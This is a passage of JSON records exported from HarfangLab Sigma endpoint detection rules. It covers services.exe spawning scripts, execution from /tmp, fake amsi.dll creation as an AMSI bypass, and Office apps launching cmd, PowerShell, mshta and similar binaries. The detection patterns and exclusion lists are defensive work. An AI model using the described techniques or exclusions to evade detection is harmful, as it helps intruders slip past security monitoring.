'?:\\Windows\\system32\\rundll32.exe appraiser.dll,DailyGatedCheck'\n # C:\\windows\\system32\\rundll32.exe invagent.dll,RunUpdate\n # C:\\Windows\\system32\\rundll32.exe invagent.dll,RunUpdate -noappraiser\n - '?:\\Windows\\system32\\rundll32.exe invagent.dll,RunUpdate*'\n - 'rundll32.exe WSClient.dll,WSpTLR licensing'\n - '?:\\Windows\\system32\\rundll32.exe portabledeviceapi.dll,#1'\n - '?:\\Windows\\system32\\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART'\n - 'cmd.exe /c %windir%\\nvcontainerrecovery.bat nvcontainerlocalsystem ?:\\programdata\\nvidia\\nvcontainerrecoverynvcontainerlocalsystem.log'\n - 'cmd.exe /C %windir%\\NvContainerRecovery.bat NVDisplay.ContainerLocalSystem ?:\\ProgramData\\NVIDIA\\NvContainerRecoveryNVDisplay.ContainerLocalSystem.log'\n - '?:\\Windows\\System32\\Rundll32.exe ?:\\Windows\\System32\\drivers\\\\*'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*\\Sauvegarde\\Scripts\\\\*'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -File ?:\\Program Files\\AzureConnectedMachineAgent\\azcmagent_check_updates.ps1'\n - 'cmd /c cd ?:\\Program Files\\Kerio\\Outlook Connector (Offline Edition)\\manticore && bin\\searchd.exe *'\n - 'cmd /c cd ?:\\Program Files (x86)\\Kerio\\Outlook Connector (Offline Edition)\\manticore && bin\\searchd.exe *'\n\n condition: selection_parent and\n (\n selection_process or\n (select_process_cmd_generic and not filter_process_cmd_generic) or\n select_process_cmd_specific or\n (select_process_powershell_generic and not filter_process_powershell_generic) or\n select_process_powershell_specific\n )\n and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6805209d-4011-4732-a79a-ad1db5090d94",
"rule_name": "Suspicious Program Launched by services.exe",
"rule_description": "Detects suspicious programs being spawned by services.exe.\nAttackers may to create services remotely to move laterally on a network, they can also abuse the Windows Service Control Manager to execute malicious commands or payloads.\nIt is recommended to check the legitimacy of the executed binary or script as well as to investigate the user responsible for this action to look for other malicious actions.\n",
"rule_creation_date": "2020-11-13",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1059.003",
"attack.t1059.005",
"attack.t1059.007",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68166cf1-d62b-4f81-8545-0da8329719b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620988Z",
"creation_date": "2026-03-23T11:45:34.620990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620994Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_temporary_path_file_execution.yml",
"content": "title: Execution from Temporary Paths\nid: 68166cf1-d62b-4f81-8545-0da8329719b3\ndescription: |\n Detects a process execution from a temporary folder.\n Attackers may to try to execute binaries in the temporary folder to evade detection and hide their traces, as temporary folders are cleaned upon reboot.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/09/27\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/tmp/'\n - '/var/tmp/'\n\n filter_path:\n Image|startswith:\n - '/tmp/*/*/'\n - '/var/tmp/*/*/'\n\n # AppImage execution: /tmp/.mount_?????/\n # /tmp/.mount_cutter-18Af24/usr/bin/cutter\n # /tmp/.mount_drawioWquxf9/drawio\n # CommandLine exclusions for shell scripts launched from these paths\n exclusion_appimage:\n - Image|startswith:\n - '/tmp/.mount_*/'\n - '/var/tmp/.mount_*/'\n - CommandLine|startswith:\n - '/bin/sh /tmp/.mount_*/'\n - '/bin/sh /var/tmp/.mount_*/'\n - '/bin/zsh /tmp/.mount_*/'\n - '/bin/zsh /var/tmp/.mount_*/'\n # dash|bash, just in case.\n - '/bin/?ash /tmp/.mount_*/'\n - '/bin/?ash /var/tmp/.mount_*/'\n\n exclusion_dropbox:\n # /tmp/.dropbox-dist-new-614wdg_l/.dropbox-dist/dropbox-lnx.x86_64-148.4.4519/dropbox\n Image: '/tmp/.dropbox-dist-new-*/dropbox'\n\n exclusion_conftest:\n # /tmp/pip-install-qlnay9pg/pycrypto_cf2c3963f87a42fa9ae01a2405ae576e/conftest\n # /tmp/pip-install-YeTZDR/pycrypto/conftest\n # /tmp/pear/temp/pear-build-defaultuser6nb1BB/rdkafka-6.0.1/conftest\n # /tmp/pear/temp/pear-build-defaultuserTIhRtM/imagick-3.7.0/conftest\n # /tmp/pear/temp/pear-build-defaultusergQ5TEA/redis-5.3.7/conftest\n # /tmp/tomcat-native-1.2.32-src/native/conftest\n # /tmp/pip-install-6ysytxgr/dbus-python_e8dcbd6233e24e718efbafe3c38accac/build/temp.linux-x86_64-3.8/conftest\n # /tmp/pear/temp/pear-build-rooti8Yo5A/ssdeep-1.1.0/conftest\n # /tmp/Python-3.10.2/conftest\n # /tmp/icu/source/conftest\n # /tmp/libbson/conftest\n Image: '/tmp/*/conftest'\n CommandLine: './conftest'\n\n exclusion_sap:\n # /tmp/sapinst_exe.405249.1652192102/jre/bin/java\n # /tmp/sapinst_exe.1618399.1650889342/jre/bin/forkhelper\n # /tmp/sapinst_exe.405249.1652192102/sapinstexe\n # /tmp/sapinst_exe.490059.1652191158/sapwebdisp\n # /tmp/sapinst_exe.490059.1652191158/ProcessWatchdog\n # /tmp/sapinst_exe.405249.1652192102/SAPCAR\n # /tmp/sapinst_instdir/GENERIC/SMD/INST/SmdSapJvm/sapjvm_8/bin/java\n # /tmp/sapinst_instdir/GENERIC/SMD/INST/SmdSapJvm/sapjvm_8/jre/bin/forkhelper\n Image:\n - '/tmp/sapinst_exe.*/*'\n - '/tmp/sapinst_instdir/*'\n\n exclusion_oracle:\n # /tmp/CVU_19.0.0.0.0_oracle/exectask\n # /tmp/RU_Oracle/gateways/install/.oui\n # /tmp/OraInstall2022-05-09_10-56-48AM/jdk/jre/bin/java\n # /tmp/OraInstall2022-05-09_11-02-28AM/jdk/bin/java\n Image:\n - '/tmp/CVU_*_oracle/exectask'\n - '/tmp/CVU_*_resource/exectask'\n - '/tmp/RU_Oracle/gateways/install/.oui'\n - '/tmp/OraInstall*/jdk/jre/bin/java'\n - '/tmp/OraInstall*/jdk/bin/java'\n\n exclusion_vmwware:\n # /tmp/.SAPOSCOL_00000F1D_A60DE0EA.EXE\n # /tmp/.SAPOSCOL_00000F1D_3DA6DF5B.EXE\n Image: '/tmp/.SAPOSCOL_????????_????????.EXE'\n CommandLine: 'vmware_getdat -q'\n\n exclusion_install_dir:\n # /tmp/install.dir.84311/Linux/resource/jre/bin/forkhelper\n # /tmp/install.dir.84311/Linux/resource/jre/bin/java\n Image:\n - '/tmp/install.dir.*/Linux/resource/jre/bin/forkhelper'\n - '/tmp/install.dir.*/Linux/resource/jre/bin/java'\n\n exclusion_veeam:\n - Image|startswith:\n - '/tmp/veeamapp'\n - '/tmp/veeamagent'\n - ParentImage:\n - '/opt/veeam/veeampluginfororaclerman/veeamagent'\n - '/opt/veeam/veeampluginfororaclerman/rmanpluginmanager'\n - Ancestors|contains:\n - '|/opt/veeam/veeampluginfororaclerman/veeamagent|'\n - '|/opt/veeam/veeampluginfororaclerman/rmanpluginmanager|'\n\n exclusion_vmtoolsd:\n - ParentImage:\n - '/usr/bin/vmtoolsd'\n - '/usr/sbin/vmtoolsd'\n - GrandparentImage:\n - '/usr/bin/vmtoolsd'\n - '/usr/sbin/vmtoolsd'\n\n exclusion_rustdoc:\n Image: '/tmp/rustdoctest??????/rust_out'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_genesys:\n ParentCommandLine|contains: '/opt/install/genesys'\n GrandparentCommandLine|contains: '/opt/install/genesys'\n\n exclusion_netbackup:\n - CommandLine: '/tmp/par-????????/temp-?????/nbhealthchecker'\n # /usr/openv/netbackup/bin/nbhealthcheckcmd\n # /usr/openv/netbackup/bin/nbpas\n - ParentImage:\n - '/usr/openv/netbackup/bin/nbhealthcheckcmd'\n - '/usr/openv/netbackup/bin/nbpas'\n - GrandparentImage:\n - '/usr/openv/netbackup/bin/nbhealthcheckcmd'\n - '/usr/openv/netbackup/bin/nbpas'\n\n exclusion_buildah:\n Image|startswith:\n - '/var/tmp/buildah??????????/'\n - '/var/tmp/buildah?????????/'\n - '/tmp/buildah??????????/'\n\n exclusion_netbackup_bpcd:\n - Image: '/usr/openv/netbackup/bin/bpcd'\n - ParentImage: '/usr/openv/netbackup/bin/bpcd'\n - GrandparentImage: '/usr/openv/netbackup/bin/bpcd'\n\n exclusion_bladelogic:\n Image: '/tmp/scanlinux-x??'\n GrandparentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_manageengine:\n ParentCommandLine: '/bin/sh ./ManageEngine_FirewallAnalyzer*.bin'\n\n exclusion_protoc:\n Image:\n - '/tmp/protoc??????????????????.exe'\n - '/tmp/protoc???????????????????.exe'\n\n exclusion_android_dev:\n # /tmp/-cache/jetbrains/remotedev/remote-dev-worker/remote-dev-worker_fcf8a611ab8f9110082dc5a71cb4e287dc9ee35120fb7880e4e56e6b92abec56\n # /tmp/-.gradle/caches/transforms-3/6cd239de5b1ec708bab6bb598b4f2db9/transformed/aapt2-7.4.0-8841542-linux/aapt2\n - Image:\n - '/tmp/*/jetbrains/remotedev/remote-dev-worker/remote-dev-worker_*'\n - '/tmp/*/sdk/platform-tools/adb'\n - '/tmp/*/sdk/emulator/crashpad_handler'\n - '/tmp/*/sdk/emulator/emulator-check'\n - '/tmp/*/sdk/emulator/emulator'\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n - ParentImage:\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n - GrandparentImage:\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n\n exclusion_bitdefender:\n # /tmp/bdconfigure.XojjIr/bdconfigure64\n Image: '/tmp/bdconfigure.*/bdconfigure64'\n\n exclusion_mkrescue:\n # /var/tmp/rear.zhtfdmzmjmff79n/rootfs/bin/tty\n # /var/tmp/rear.ixgclpcvcimidyu/rootfs/bin/tty\n # /var/tmp/rear.ixgclpcvcimidyu/rootfs/usr/lib/ld-2.17.so\n # /var/tmp/rear.fohwn9pxrtmph4t/rootfs/bin/cat\n ProcessImage|startswith: '/var/tmp/rear.???????????????/rootfs/'\n\n exclusion_dbvisit:\n # /tmp/par-6f7261636c65/cache-b383cface1d28c890ef9b3d2e84c40dfa18b42ec/dbvctl\n # /tmp/par-6f7261636c65/cache-1735cb40c61060f403facf36dfecf7cfe5e34492/dbvctl\n ProcessImage:\n - '/tmp/par-????????????/cache-????????????????????????????????????????/dbvctl'\n - '/tmp/par-????????????/cache-????????????????????????????????????????/pandora_db'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_ollama:\n ProcessImage|startswith:\n - '/tmp/ollama/'\n - '/tmp/ollama*/runners/*/ollama_llama_server'\n\n # TODO: Add a `Ancestors|contains: /usr/bin/make` (and cmake) exclusion\n # since a lot of build-systems use /tmp for their tests.\n\n exclusion_vscode:\n Ancestors|contains:\n - '|/usr/share/code/code|'\n - '|/snap/code/??/usr/share/code/code|'\n - '|/snap/code/???/usr/share/code/code|'\n - '|/snap/code/????/usr/share/code/code|'\n - '|/snap/code/?????/usr/share/code/code|'\n - '|/usr/share/vscodium/vscodium|'\n\n exclusion_veeamapp:\n ProcessImage: '/tmp/VeeamApp_????????-????-????-????-????????????'\n\n exclusion_pandora_server:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/pandora_server'\n ProcessImage|startswith: '/tmp/par-*/cache-*/'\n\n exclusion_convert:\n ProcessImage: '/tmp/wptoolsrtfconvert*'\n\n exclusion_gitaly:\n ProcessImage|startswith: '/tmp/gitaly-'\n\n exclusion_docker:\n ProcessAncestors|contains: '|/usr/bin/containerd-shim|'\n\n exclusion_terraform:\n ProcessParentImage: '/usr/bin/terraform'\n\n exclusion_coder:\n ProcessImage: '/tmp/coder.??????/coder'\n\n exclusion_sonarqube:\n ProcessImage|startswith: '/tmp/.sonar/cache'\n\n exclusion_sipp:\n ProcessImage|startswith: '/tmp/sipp/sippx86_64'\n\n exclusion_conda_pixi:\n ProcessImage: '/tmp/*/.CondaPkg/.pixi'\n\n exclusion_libertp:\n ProcessImage: '/tmp/ltpx_refchr/gettargetid64_linux'\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68166cf1-d62b-4f81-8545-0da8329719b3",
"rule_name": "Execution from Temporary Paths",
"rule_description": "Detects a process execution from a temporary folder.\nAttackers may to try to execute binaries in the temporary folder to evade detection and hide their traces, as temporary folders are cleaned upon reboot.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2021-09-27",
"rule_modified_date": "2026-02-16",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6841ffbd-a5e2-4fea-a4f5-68d0a12bec53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590997Z",
"creation_date": "2026-03-23T11:45:34.591000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591007Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-Cornelis-de-Plaas-DLL-hijack-method",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_fake_amsi_creation.yml",
"content": "title: AMSI Library Created in Suspicious Location\nid: 6841ffbd-a5e2-4fea-a4f5-68d0a12bec53\ndescription: |\n Detects the creation of a file called \"amsi.dll\" in an unusual location.\n Attackers can create a fake \"amsi.dll\" file in an unusual location to prevent the processes in the same folder to load the legitimate library, bypassing the Antimalware Scan Interface (AMSI) mechanism.\n It is recommended to investigate the origin and the content of the written DLL, as well as surrounding security events and the process that wrote the file to disk.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-Cornelis-de-Plaas-DLL-hijack-method\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: file_create\ndetection:\n selection:\n Path|endswith: '\\amsi.dll'\n\n filter_unc_path:\n Path|contains: '\\Device\\HarddiskVolume*\\\\'\n\n exclusion_windows_path:\n Path|endswith:\n - '\\Windows\\system32\\amsi.dll'\n - '\\Windows\\Syswow64\\amsi.dll'\n - '\\Windows\\WinSxS\\\\*\\amsi.dll'\n - '\\Windows\\\\*\\amd64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\Windows\\\\*\\wow64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\W10UIuup\\Windows11*\\amd64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\W10UIuup\\Windows11*\\wow64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\$WINDOWS.~BT\\\\*\\amsi.dll'\n - '\\$WINDOWS.~TMP\\\\*\\amsi.dll'\n\n exclusion_rollup_fix:\n Path|contains: '\\package_for_rollupfix'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6841ffbd-a5e2-4fea-a4f5-68d0a12bec53",
"rule_name": "AMSI Library Created in Suspicious Location",
"rule_description": "Detects the creation of a file called \"amsi.dll\" in an unusual location.\nAttackers can create a fake \"amsi.dll\" file in an unusual location to prevent the processes in the same folder to load the legitimate library, bypassing the Antimalware Scan Interface (AMSI) mechanism.\nIt is recommended to investigate the origin and the content of the written DLL, as well as surrounding security events and the process that wrote the file to disk.\n",
"rule_creation_date": "2025-08-29",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "686d2296-eed8-4f0a-8e68-174ea45e8902",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294549Z",
"creation_date": "2026-03-23T11:45:35.294552Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294559Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1104_office_application_spawning_malicious_processes_appdata.yml",
"content": "title: Dangerous Process Started by Microsoft Office Application with Reference to an AppData Folder\nid: 686d2296-eed8-4f0a-8e68-174ea45e8902\ndescription: |\n Detects various potentially malicious binaries started from Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...) with reference to an AppData folder.\n Attackers can send malicious documents through phishing to gain an initial foothold on their targets.\n The AppData folder is often used by attackers to hide their malicious payloads.\n It is recommended to investigate the parent process to check if a suspicious office document has been opened.\nreferences:\n - https://attack.mitre.org/techniques/T1203/\ndate: 2020/07/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 'appvlp.exe'\n\n selection_appdata:\n ParentCommandLine|contains: '\\AppData\\'\n\n exclusion_photoviewer:\n # parent is outlook\n # \"C:\\windows\\System32\\rundll32.exe\" \"C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll\", ImageView_Fullscreen C:\\Users\\smalka\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\2UBOS01P\\Screenshot_20210113-145546_WhatsApp.jpg\n CommandLine|contains: '?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n\n exclusion_false_positives:\n # lots of FP here...\n CommandLine:\n - '*ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile*'\n - '*cryptext.dll,CryptExtAddPFX*'\n - '*cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd*'\n - '*?:\\windows\\system32\\spool\\drivers\\\\*'\n - '*\\ZoneCentral\\zedmail.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail.dll*'\n - '*\\ZoneCentral\\zedmail32.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail32.dll*'\n - '*printui.dll,PrintUIEntry*'\n - '*shell32.dll,Control_RunDLL*srchadmin.dll*'\n # - '*c:\\windows\\system32\\mshtml.dll*' # mshtml only could permit dangerous stuff\n - '*dfshim.dll*ShOpenVerbApplication*'\n - '*shell32.dll,SHCreateLocalServerRunDll *{3eef301f-b596-4c0b-bd92-013beafce793}*' # Desktop Undo Manager\n # C:\\windows\\system32\\rundll32.exe C:\\windows\\syswow64\\WININET.dll,DispatchAPICall 1\n - '*\\windows\\syswow64\\WININET.dll,DispatchAPICall 1'\n - '*\\windows\\system32\\WININET.dll,DispatchAPICall 1'\n # C:\\WINDOWS\\system32\\MSIEXEC.EXE /X {AB966E92-1EB2-4BEB-81CA-6B319681B977} /QB\n - '*\\MSIEXEC.EXE /X {????????-????-????-????-????????????} /QB'\n # \"C:\\WINDOWS\\system32\\MSIEXEC.EXE\" /X {7EE8ACD7-531C-4E3E-A481-E2D468CB6DDD} /QB\n - '*\\MSIEXEC.EXE? /X {????????-????-????-????-????????????} /QB'\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER *'\n # https://www.tenforums.com/tutorials/77458-rundll32-commands-list-windows-10-a.html\n - '*shwebsvc.dll,AddNetPlaceRunDll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,ImageView_PrintTo *'\n\n exclusion_outlook:\n CommandLine:\n # C:\\Windows\\System32\\msiexec.exe /focmu {90150000-0011-0000-0000-0000000FF1CE} /lwieap C:\\Users\\xxxx\\AppData\\Local\\Temp\\Microsoft Office Professional Plus 2013_repair_log(0002).txt /qb+\n - '?:\\Windows\\System32\\msiexec.exe /focmu {90150000-0011-0000-0000-0000000FF1CE} /lwieap ?:\\Users\\\\*\\AppData\\Local\\Temp\\Microsoft Office *.txt /qb+'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,OpenAs_RunDLL ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\\\*'\n\n exclusion_safeofficeaddin:\n CommandLine:\n - '?:\\WINDOWS\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n - '?:\\Windows\\SysWOW64\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n\n exclusion_genapi:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd'\n\n exclusion_poweruser:\n CommandLine|contains: 'msiexec.exe /i ?:\\Users\\\\*\\Power-user*.msi /QN'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "686d2296-eed8-4f0a-8e68-174ea45e8902",
"rule_name": "Dangerous Process Started by Microsoft Office Application with Reference to an AppData Folder",
"rule_description": "Detects various potentially malicious binaries started from Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...) with reference to an AppData folder.\nAttackers can send malicious documents through phishing to gain an initial foothold on their targets.\nThe AppData folder is often used by attackers to hide their malicious payloads.\nIt is recommended to investigate the parent process to check if a suspicious office document has been opened.\n",
"rule_creation_date": "2020-07-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68dc5935-e8e4-4223-b4ca-abdf6c9864d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626719Z",
"creation_date": "2026-03-23T11:45:34.626721Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626725Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log_remote.yml",
